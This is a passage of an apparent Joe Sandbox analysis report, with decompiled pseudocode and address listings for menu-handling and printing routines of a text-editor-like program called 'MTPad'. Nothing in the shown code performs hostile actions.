                                                                                                                                                                                                                                                                                          										_v160 = 0;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										 *_t105 = 0x1313;
                                                                                                                                                                                                                                                                                          										_t159 = _t105;
                                                                                                                                                                                                                                                                                          										_v160 = _t105;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									_v8 = 0;
                                                                                                                                                                                                                                                                                          									__eflags = _t159;
                                                                                                                                                                                                                                                                                          									if(_t159 == 0) {
                                                                                                                                                                                                                                                                                          										goto L37;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										 *((intOrPtr*)(_t159 + 8)) = _v208.fType;
                                                                                                                                                                                                                                                                                          										 *((intOrPtr*)(_t159 + 0xc)) = _v208.fState;
                                                                                                                                                                                                                                                                                          										_v208.fType = _v208.fType | 0x00000100;
                                                                                                                                                                                                                                                                                          										 *(_t159 + 0x10) = 0xffffffff;
                                                                                                                                                                                                                                                                                          										_t146 =  *(_t150 + 0x50);
                                                                                                                                                                                                                                                                                          										_t107 = 0;
                                                                                                                                                                                                                                                                                          										__eflags = _t146;
                                                                                                                                                                                                                                                                                          										if(__eflags <= 0) {
                                                                                                                                                                                                                                                                                          											L30:
                                                                                                                                                                                                                                                                                          											_t61 = lstrlenA( &_v136) + 1; // 0x1
                                                                                                                                                                                                                                                                                          											_t152 = _t61;
                                                                                                                                                                                                                                                                                          											_push(_t152);
                                                                                                                                                                                                                                                                                          											_v148 = _t152;
                                                                                                                                                                                                                                                                                          											 *(_t159 + 4) = 0;
                                                                                                                                                                                                                                                                                          											_v8 = 3;
                                                                                                                                                                                                                                                                                          											_t109 = E00815DD7( &_v136, _t152, _t159, __eflags);
                                                                                                                                                                                                                                                                                          											_t164 = _t164 + 4;
                                                                                                                                                                                                                                                                                          											 *(_t159 + 4) = _t109;
                                                                                                                                                                                                                                                                                          											_v8 = 0;
                                                                                                                                                                                                                                                                                          											_t126 =  *(_t159 + 4);
                                                                                                                                                                                                                                                                                          											__eflags = _t126;
                                                                                                                                                                                                                                                                                          											if(_t126 != 0) {
                                                                                                                                                                                                                                                                                          												_t113 = lstrlenA( &_v136);
                                                                                                                                                                                                                                                                                          												__eflags = _t152 - _t113;
                                                                                                                                                                                                                                                                                          												if(_t152 > _t113) {
                                                                                                                                                                                                                                                                                          													lstrcpyA(_t126,  &_v136);
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          											_t145 =  &_v208;
                                                                                                                                                                                                                                                                                          											_v208.dwItemData = _t159;
                                                                                                                                                                                                                                                                                          											SetMenuItemInfoA(_v144, _v140, 1,  &_v208);
                                                                                                                                                                                                                                                                                          											_t123 = _v144;
                                                                                                                                                                                                                                                                                          											_t150 = _v152;
                                                                                                                                                                                                                                                                                          											goto L37;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											_t127 = _v208.wID;
                                                                                                                                                                                                                                                                                          											while(1) {
                                                                                                                                                                                                                                                                                          												__eflags = _t107;
                                                                                                                                                                                                                                                                                          												if(_t107 < 0) {
                                                                                                                                                                                                                                                                                          													break;
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          												__eflags = _t107 - _t146;
                                                                                                                                                                                                                                                                                          												if(_t107 >= _t146) {
                                                                                                                                                                                                                                                                                          													break;
                                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                                          													__eflags = ( *( *((intOrPtr*)(_t150 + 0x4c)) + _t107 * 2) & 0x0000ffff) - _t127;
                                                                                                                                                                                                                                                                                          													if(__eflags == 0) {
                                                                                                                                                                                                                                                                                          														 *(_t159 + 0x10) = _t107;
                                                                                                                                                                                                                                                                                          														goto L30;
                                                                                                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                                                                                                          														_t107 = _t107 + 1;
                                                                                                                                                                                                                                                                                          														__eflags = _t107 - _t146;
                                                                                                                                                                                                                                                                                          														if(__eflags < 0) {
                                                                                                                                                                                                                                                                                          															continue;
                                                                                                                                                                                                                                                                                          														} else {
                                                                                                                                                                                                                                                                                          															goto L30;
                                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          												goto L41;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          											RaiseException(0xc000008c, 1, 0, 0);
                                                                                                                                                                                                                                                                                          											_v8 = 0;
                                                                                                                                                                                                                                                                                          											return E0080E542;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								goto L41;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_v148 = _t123;
                                                                                                                                                                                                                                                                                          							E00811C50( &_v148, _t150 + 0x14);
                                                                                                                                                                                                                                                                                          							goto L39;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						__eflags = _t145 & 0x00000001;
                                                                                                                                                                                                                                                                                          						if((_t145 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                                          							goto L1;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							goto L4;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					L1:
                                                                                                                                                                                                                                                                                          					 *_t121 = 0;
                                                                                                                                                                                                                                                                                          					_t97 = 1;
                                                                                                                                                                                                                                                                                          					L40:
                                                                                                                                                                                                                                                                                          					 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          					_pop(_t151);
                                                                                                                                                                                                                                                                                          					_pop(_t155);
                                                                                                                                                                                                                                                                                          					_pop(_t122);
                                                                                                                                                                                                                                                                                          					return E008159E6(_t97, _t122, _v28 ^ _t161, _t145, _t151, _t155);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L41:
                                                                                                                                                                                                                                                                                          			}















































                                                                                                                                                                                                                                                                                          0x0080e2d0
                                                                                                                                                                                                                                                                                          0x0080e2d1
                                                                                                                                                                                                                                                                                          0x0080e2d3
                                                                                                                                                                                                                                                                                          0x0080e2d5
                                                                                                                                                                                                                                                                                          0x0080e2e0
                                                                                                                                                                                                                                                                                          0x0080e2e1
                                                                                                                                                                                                                                                                                          0x0080e2e7
                                                                                                                                                                                                                                                                                          0x0080e2ec
                                                                                                                                                                                                                                                                                          0x0080e2ee
                                                                                                                                                                                                                                                                                          0x0080e2f4
                                                                                                                                                                                                                                                                                          0x0080e2f8
                                                                                                                                                                                                                                                                                          0x0080e2fe
                                                                                                                                                                                                                                                                                          0x0080e301
                                                                                                                                                                                                                                                                                          0x0080e304
                                                                                                                                                                                                                                                                                          0x0080e30c
                                                                                                                                                                                                                                                                                          0x0080e30e
                                                                                                                                                                                                                                                                                          0x0080e316
                                                                                                                                                                                                                                                                                          0x0080e328
                                                                                                                                                                                                                                                                                          0x0080e332
                                                                                                                                                                                                                                                                                          0x0080e332
                                                                                                                                                                                                                                                                                          0x0080e334
                                                                                                                                                                                                                                                                                          0x0080e33b
                                                                                                                                                                                                                                                                                          0x0080e33b
                                                                                                                                                                                                                                                                                          0x0080e33d
                                                                                                                                                                                                                                                                                          0x0080e37b
                                                                                                                                                                                                                                                                                          0x0080e37d
                                                                                                                                                                                                                                                                                          0x0080e397
                                                                                                                                                                                                                                                                                          0x0080e397
                                                                                                                                                                                                                                                                                          0x0080e37f
                                                                                                                                                                                                                                                                                          0x0080e37f
                                                                                                                                                                                                                                                                                          0x0080e382
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080e384
                                                                                                                                                                                                                                                                                          0x0080e38f
                                                                                                                                                                                                                                                                                          0x0080e38f
                                                                                                                                                                                                                                                                                          0x0080e382
                                                                                                                                                                                                                                                                                          0x0080e39c
                                                                                                                                                                                                                                                                                          0x0080e39f
                                                                                                                                                                                                                                                                                          0x0080e3a3
                                                                                                                                                                                                                                                                                          0x0080e3a4
                                                                                                                                                                                                                                                                                          0x0080e3a5
                                                                                                                                                                                                                                                                                          0x0080e3a6
                                                                                                                                                                                                                                                                                          0x0080e33f
                                                                                                                                                                                                                                                                                          0x0080e33f
                                                                                                                                                                                                                                                                                          0x0080e341
                                                                                                                                                                                                                                                                                          0x0080e369
                                                                                                                                                                                                                                                                                          0x0080e369
                                                                                                                                                                                                                                                                                          0x0080e371
                                                                                                                                                                                                                                                                                          0x0080e375
                                                                                                                                                                                                                                                                                          0x0080e376
                                                                                                                                                                                                                                                                                          0x0080e377
                                                                                                                                                                                                                                                                                          0x0080e378
                                                                                                                                                                                                                                                                                          0x0080e343
                                                                                                                                                                                                                                                                                          0x0080e343
                                                                                                                                                                                                                                                                                          0x0080e346
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080e348
                                                                                                                                                                                                                                                                                          0x0080e353
                                                                                                                                                                                                                                                                                          0x0080e359
                                                                                                                                                                                                                                                                                          0x0080e35f
                                                                                                                                                                                                                                                                                          0x0080e363
                                                                                                                                                                                                                                                                                          0x0080e364
                                                                                                                                                                                                                                                                                          0x0080e365
                                                                                                                                                                                                                                                                                          0x0080e366
                                                                                                                                                                                                                                                                                          0x0080e366
                                                                                                                                                                                                                                                                                          0x0080e346
                                                                                                                                                                                                                                                                                          0x0080e341
                                                                                                                                                                                                                                                                                          0x0080e3a7
                                                                                                                                                                                                                                                                                          0x0080e3ad
                                                                                                                                                                                                                                                                                          0x0080e3b4
                                                                                                                                                                                                                                                                                          0x0080e3ba
                                                                                                                                                                                                                                                                                          0x0080e5c3
                                                                                                                                                                                                                                                                                          0x0080e5c3
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080e3c0
                                                                                                                                                                                                                                                                                          0x0080e3c0
                                                                                                                                                                                                                                                                                          0x0080e3c2
                                                                                                                                                                                                                                                                                          0x0080e3c8
                                                                                                                                                                                                                                                                                          0x0080e3c8
                                                                                                                                                                                                                                                                                          0x0080e3ca
                                                                                                                                                                                                                                                                                          0x0080e3cd
                                                                                                                                                                                                                                                                                          0x0080e3ce
                                                                                                                                                                                                                                                                                          0x0080e3d4
                                                                                                                                                                                                                                                                                          0x0080e3da
                                                                                                                                                                                                                                                                                          0x0080e3dc
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080e3ed
                                                                                                                                                                                                                                                                                          0x0080e3f2
                                                                                                                                                                                                                                                                                          0x0080e3f5
                                                                                                                                                                                                                                                                                          0x0080e3ff
                                                                                                                                                                                                                                                                                          0x0080e404
                                                                                                                                                                                                                                                                                          0x0080e406
                                                                                                                                                                                                                                                                                          0x0080e408
                                                                                                                                                                                                                                                                                          0x0080e408
                                                                                                                                                                                                                                                                                          0x0080e412
                                                                                                                                                                                                                                                                                          0x0080e423
                                                                                                                                                                                                                                                                                          0x0080e42d
                                                                                                                                                                                                                                                                                          0x0080e437
                                                                                                                                                                                                                                                                                          0x0080e43d
                                                                                                                                                                                                                                                                                          0x0080e443
                                                                                                                                                                                                                                                                                          0x0080e44d
                                                                                                                                                                                                                                                                                          0x0080e5a3
                                                                                                                                                                                                                                                                                          0x0080e5a9
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080e453
                                                                                                                                                                                                                                                                                          0x0080e453
                                                                                                                                                                                                                                                                                          0x0080e455
                                                                                                                                                                                                                                                                                          0x0080e45f
                                                                                                                                                                                                                                                                                          0x0080e463
                                                                                                                                                                                                                                                                                          0x0080e468
                                                                                                                                                                                                                                                                                          0x0080e46b
                                                                                                                                                                                                                                                                                          0x0080e46d
                                                                                                                                                                                                                                                                                          0x0080e47f
                                                                                                                                                                                                                                                                                          0x0080e47f
                                                                                                                                                                                                                                                                                          0x0080e481
                                                                                                                                                                                                                                                                                          0x0080e46f
                                                                                                                                                                                                                                                                                          0x0080e46f
                                                                                                                                                                                                                                                                                          0x0080e475
                                                                                                                                                                                                                                                                                          0x0080e477
                                                                                                                                                                                                                                                                                          0x0080e477
                                                                                                                                                                                                                                                                                          0x0080e487
                                                                                                                                                                                                                                                                                          0x0080e48e
                                                                                                                                                                                                                                                                                          0x0080e490
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080e496
                                                                                                                                                                                                                                                                                          0x0080e49c
                                                                                                                                                                                                                                                                                          0x0080e4a5
                                                                                                                                                                                                                                                                                          0x0080e4a8
                                                                                                                                                                                                                                                                                          0x0080e4b2
                                                                                                                                                                                                                                                                                          0x0080e4b9
                                                                                                                                                                                                                                                                                          0x0080e4bc
                                                                                                                                                                                                                                                                                          0x0080e4be
                                                                                                                                                                                                                                                                                          0x0080e4c0
                                                                                                                                                                                                                                                                                          0x0080e4e2
                                                                                                                                                                                                                                                                                          0x0080e4ef
                                                                                                                                                                                                                                                                                          0x0080e4ef
                                                                                                                                                                                                                                                                                          0x0080e4f4
                                                                                                                                                                                                                                                                                          0x0080e4f5
                                                                                                                                                                                                                                                                                          0x0080e4fb
                                                                                                                                                                                                                                                                                          0x0080e4fe
                                                                                                                                                                                                                                                                                          0x0080e502
                                                                                                                                                                                                                                                                                          0x0080e507
                                                                                                                                                                                                                                                                                          0x0080e50a
                                                                                                                                                                                                                                                                                          0x0080e50d
                                                                                                                                                                                                                                                                                          0x0080e54e
                                                                                                                                                                                                                                                                                          0x0080e551
                                                                                                                                                                                                                                                                                          0x0080e553
                                                                                                                                                                                                                                                                                          0x0080e55c
                                                                                                                                                                                                                                                                                          0x0080e562
                                                                                                                                                                                                                                                                                          0x0080e564
                                                                                                                                                                                                                                                                                          0x0080e56e
                                                                                                                                                                                                                                                                                          0x0080e56e
                                                                                                                                                                                                                                                                                          0x0080e564
                                                                                                                                                                                                                                                                                          0x0080e580
                                                                                                                                                                                                                                                                                          0x0080e58b
                                                                                                                                                                                                                                                                                          0x0080e591
                                                                                                                                                                                                                                                                                          0x0080e597
                                                                                                                                                                                                                                                                                          0x0080e59d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080e4c2
                                                                                                                                                                                                                                                                                          0x0080e4c2
                                                                                                                                                                                                                                                                                          0x0080e4c8
                                                                                                                                                                                                                                                                                          0x0080e4c8
                                                                                                                                                                                                                                                                                          0x0080e4ca
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080e4cc
                                                                                                                                                                                                                                                                                          0x0080e4ce
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080e4d0
                                                                                                                                                                                                                                                                                          0x0080e4d9
                                                                                                                                                                                                                                                                                          0x0080e4db
                                                                                                                                                                                                                                                                                          0x0080e51f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080e4dd
                                                                                                                                                                                                                                                                                          0x0080e4dd
                                                                                                                                                                                                                                                                                          0x0080e4de
                                                                                                                                                                                                                                                                                          0x0080e4e0
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080e4e0
                                                                                                                                                                                                                                                                                          0x0080e4db
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080e4ce
                                                                                                                                                                                                                                                                                          0x0080e52f
                                                                                                                                                                                                                                                                                          0x0080e535
                                                                                                                                                                                                                                                                                          0x0080e541
                                                                                                                                                                                                                                                                                          0x0080e541
                                                                                                                                                                                                                                                                                          0x0080e4c0
                                                                                                                                                                                                                                                                                          0x0080e490
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080e44d
                                                                                                                                                                                                                                                                                          0x0080e5af
                                                                                                                                                                                                                                                                                          0x0080e5be
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080e5be
                                                                                                                                                                                                                                                                                          0x0080e336
                                                                                                                                                                                                                                                                                          0x0080e336
                                                                                                                                                                                                                                                                                          0x0080e339
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080e339
                                                                                                                                                                                                                                                                                          0x0080e318
                                                                                                                                                                                                                                                                                          0x0080e318
                                                                                                                                                                                                                                                                                          0x0080e318
                                                                                                                                                                                                                                                                                          0x0080e31e
                                                                                                                                                                                                                                                                                          0x0080e5c9
                                                                                                                                                                                                                                                                                          0x0080e5cc
                                                                                                                                                                                                                                                                                          0x0080e5d4
                                                                                                                                                                                                                                                                                          0x0080e5d5
                                                                                                                                                                                                                                                                                          0x0080e5d6
                                                                                                                                                                                                                                                                                          0x0080e5e4
                                                                                                                                                                                                                                                                                          0x0080e5e4
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ItemMenu$CallCountInfoMessageProcSendWindow_memset
                                                                                                                                                                                                                                                                                          • String ID: ,$1$d
                                                                                                                                                                                                                                                                                          • API String ID: 3483846687-1943914033
                                                                                                                                                                                                                                                                                          • Opcode ID: ae4c7f1a8dccf5d3dfef06b51c35d9c61d6eed71a2ec4f4cb23233bcd6625e1b
                                                                                                                                                                                                                                                                                          • Instruction ID: 6025877b63593f3f079a82cf7fcf043221a41f7da4afdd381151e8d530e1d8e5
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae4c7f1a8dccf5d3dfef06b51c35d9c61d6eed71a2ec4f4cb23233bcd6625e1b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9917FB1A01619DFEB64CF54CC85BAABBB8FB44304F108999E949D7281D770AA44CFA0
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                                                                                                                          			E00809110(intOrPtr __ecx, struct HWND__* __edx, void* __eflags) {
                                                                                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                                          				char _v92;
                                                                                                                                                                                                                                                                                          				intOrPtr* _v96;
                                                                                                                                                                                                                                                                                          				intOrPtr _v100;
                                                                                                                                                                                                                                                                                          				signed int _v104;
                                                                                                                                                                                                                                                                                          				signed int _v108;
                                                                                                                                                                                                                                                                                          				signed int _v112;
                                                                                                                                                                                                                                                                                          				signed int _v128;
                                                                                                                                                                                                                                                                                          				char _v132;
                                                                                                                                                                                                                                                                                          				short _v144;
                                                                                                                                                                                                                                                                                          				signed int _v148;
                                                                                                                                                                                                                                                                                          				signed int _v180;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t87;
                                                                                                                                                                                                                                                                                          				char* _t94;
                                                                                                                                                                                                                                                                                          				void* _t97;
                                                                                                                                                                                                                                                                                          				void* _t105;
                                                                                                                                                                                                                                                                                          				signed int _t109;
                                                                                                                                                                                                                                                                                          				void* _t112;
                                                                                                                                                                                                                                                                                          				unsigned int _t116;
                                                                                                                                                                                                                                                                                          				signed int* _t136;
                                                                                                                                                                                                                                                                                          				signed int _t138;
                                                                                                                                                                                                                                                                                          				intOrPtr _t156;
                                                                                                                                                                                                                                                                                          				void* _t177;
                                                                                                                                                                                                                                                                                          				signed int* _t178;
                                                                                                                                                                                                                                                                                          				intOrPtr _t184;
                                                                                                                                                                                                                                                                                          				signed int _t188;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_push(E0081FB73);
                                                                                                                                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          				_t87 =  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          				_push(_t87 ^ _t188);
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          				_t184 = __ecx;
                                                                                                                                                                                                                                                                                          				if(E00808E40(__edx, __ecx) != 0) {
                                                                                                                                                                                                                                                                                          					_v128 = 0;
                                                                                                                                                                                                                                                                                          					_v112 = 0;
                                                                                                                                                                                                                                                                                          					_v108 = 0;
                                                                                                                                                                                                                                                                                          					_v104 = 0;
                                                                                                                                                                                                                                                                                          					_v100 = DefWindowProcA;
                                                                                                                                                                                                                                                                                          					_v96 =  &_v92;
                                                                                                                                                                                                                                                                                          					E00816820( &_v92, 0, 0x42);
                                                                                                                                                                                                                                                                                          					 *_v96 = 0x42;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_v96 + 4)) = 0;
                                                                                                                                                                                                                                                                                          					 *(_v96 + 0x14) = 0x4300c;
                                                                                                                                                                                                                                                                                          					_t94 =  &M008056C0;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_v96 + 0x2a)) = _t94;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_v96 + 0x2e)) = _t94;
                                                                                                                                                                                                                                                                                          					 *(_v96 + 0x14) =  *(_v96 + 0x14) | 0x00000100;
                                                                                                                                                                                                                                                                                          					 *(_v96 + 0x14) =  *(_v96 + 0x14) & 0xfffffdff;
                                                                                                                                                                                                                                                                                          					_v132 = 0x822d7c;
                                                                                                                                                                                                                                                                                          					_t136 = _t184 + 0x4bc;
                                                                                                                                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                                                                                                                                          					__eflags =  *_t136;
                                                                                                                                                                                                                                                                                          					if( *_t136 == 0) {
                                                                                                                                                                                                                                                                                          						L6:
                                                                                                                                                                                                                                                                                          						_t97 = 0;
                                                                                                                                                                                                                                                                                          						__eflags = 0;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						__eflags = _t136[1];
                                                                                                                                                                                                                                                                                          						if(_t136[1] == 0) {
                                                                                                                                                                                                                                                                                          							goto L6;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t127 = _t136[1];
                                                                                                                                                                                                                                                                                          							_t181 = ( *(_t136[1] + 0x26) & 0x0000ffff) + ( *(_t127 + 0x24) & 0x0000ffff);
                                                                                                                                                                                                                                                                                          							_t97 = GlobalAlloc(2, ( *(_t136[1] + 0x26) & 0x0000ffff) + ( *(_t127 + 0x24) & 0x0000ffff));
                                                                                                                                                                                                                                                                                          							_v20 = _t97;
                                                                                                                                                                                                                                                                                          							__eflags = _t97;
                                                                                                                                                                                                                                                                                          							if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          								E008196A0(GlobalLock(_t97), _t136[1], _t181);
                                                                                                                                                                                                                                                                                          								GlobalUnlock(_v20);
                                                                                                                                                                                                                                                                                          								_t97 = _v20;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					 *(_v96 + 8) = _t97;
                                                                                                                                                                                                                                                                                          					 *(_v96 + 0xc) = E0080C710(_t184 + 0x4b8, __eflags);
                                                                                                                                                                                                                                                                                          					 *((short*)(_v96 + 0x1c)) = 1;
                                                                                                                                                                                                                                                                                          					 *((short*)(_v96 + 0x1e)) =  *((intOrPtr*)(_t184 + 0x530));
                                                                                                                                                                                                                                                                                          					 *((short*)(_v96 + 0x18)) = 1;
                                                                                                                                                                                                                                                                                          					 *((short*)(_v96 + 0x1a)) =  *((intOrPtr*)(_t184 + 0x530));
                                                                                                                                                                                                                                                                                          					 *(_v96 + 0x14) =  *(_v96 + 0x14) & 0xfffffff7;
                                                                                                                                                                                                                                                                                          					_t105 = E0080AF50(GetActiveWindow(),  &_v132, _t184);
                                                                                                                                                                                                                                                                                          					__eflags = _t105 - 1;
                                                                                                                                                                                                                                                                                          					if(_t105 == 1) {
                                                                                                                                                                                                                                                                                          						_t177 =  *(_v96 + 8);
                                                                                                                                                                                                                                                                                          						__eflags = _t177;
                                                                                                                                                                                                                                                                                          						if(_t177 != 0) {
                                                                                                                                                                                                                                                                                          							E0080FE10(GlobalLock(_t177), _t136);
                                                                                                                                                                                                                                                                                          							GlobalUnlock(_t177);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t112 =  *(_t184 + 0x4b8);
                                                                                                                                                                                                                                                                                          						_t178 = _t184 + 0x4b8;
                                                                                                                                                                                                                                                                                          						__eflags = _t112;
                                                                                                                                                                                                                                                                                          						if(_t112 != 0) {
                                                                                                                                                                                                                                                                                          							ClosePrinter(_t112);
                                                                                                                                                                                                                                                                                          							 *_t178 = 0;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						E0080C5D0( *((intOrPtr*)(_t184 + 0x4c0)), _t178,  *(_v96 + 0xc));
                                                                                                                                                                                                                                                                                          						_t138 = 0;
                                                                                                                                                                                                                                                                                          						_v180 = 0;
                                                                                                                                                                                                                                                                                          						_v148 = 0;
                                                                                                                                                                                                                                                                                          						_v144 = 0x100;
                                                                                                                                                                                                                                                                                          						_v8 = 1;
                                                                                                                                                                                                                                                                                          						_t156 = _v96;
                                                                                                                                                                                                                                                                                          						_t116 =  *(_t156 + 0x14);
                                                                                                                                                                                                                                                                                          						_t171 =  *((intOrPtr*)(_t184 + 0x530)) - 1;
                                                                                                                                                                                                                                                                                          						__eflags = _t116 & 0x00000002;
                                                                                                                                                                                                                                                                                          						if((_t116 & 0x00000002) != 0) {
                                                                                                                                                                                                                                                                                          							_t138 = ( *(_t156 + 0x18) & 0x0000ffff) - 1;
                                                                                                                                                                                                                                                                                          							_t171 = ( *(_t156 + 0x1a) & 0x0000ffff) - 1;
                                                                                                                                                                                                                                                                                          							__eflags = ( *(_t156 + 0x1a) & 0x0000ffff) - 1;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						E00806510( &_v180, _t184 + 0x34, _t171,  *_t178,  *((intOrPtr*)(_t184 + 0x4c0)), _t138, _t116 >> 0x00000005 & 1);
                                                                                                                                                                                                                                                                                          						__eflags = _v180;
                                                                                                                                                                                                                                                                                          						if(_v180 != 0) {
                                                                                                                                                                                                                                                                                          							_v180 = 0;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					GlobalFree( *(_v96 + 8));
                                                                                                                                                                                                                                                                                          					GlobalFree( *(_v96 + 0xc));
                                                                                                                                                                                                                                                                                          					_v8 = 0xffffffff;
                                                                                                                                                                                                                                                                                          					_t109 = _v112;
                                                                                                                                                                                                                                                                                          					__eflags = _t109;
                                                                                                                                                                                                                                                                                          					if(_t109 != 0) {
                                                                                                                                                                                                                                                                                          						E00815701(_t109);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					__eflags = 0;
                                                                                                                                                                                                                                                                                          					 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					MessageBoxA( *(_t184 + 4), "Print operation failed", "MTPad", 0x10);
                                                                                                                                                                                                                                                                                          					 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}


































                                                                                                                                                                                                                                                                                          0x00809113
                                                                                                                                                                                                                                                                                          0x00809115
                                                                                                                                                                                                                                                                                          0x00809120
                                                                                                                                                                                                                                                                                          0x0080912a
                                                                                                                                                                                                                                                                                          0x00809131
                                                                                                                                                                                                                                                                                          0x00809135
                                                                                                                                                                                                                                                                                          0x0080913b
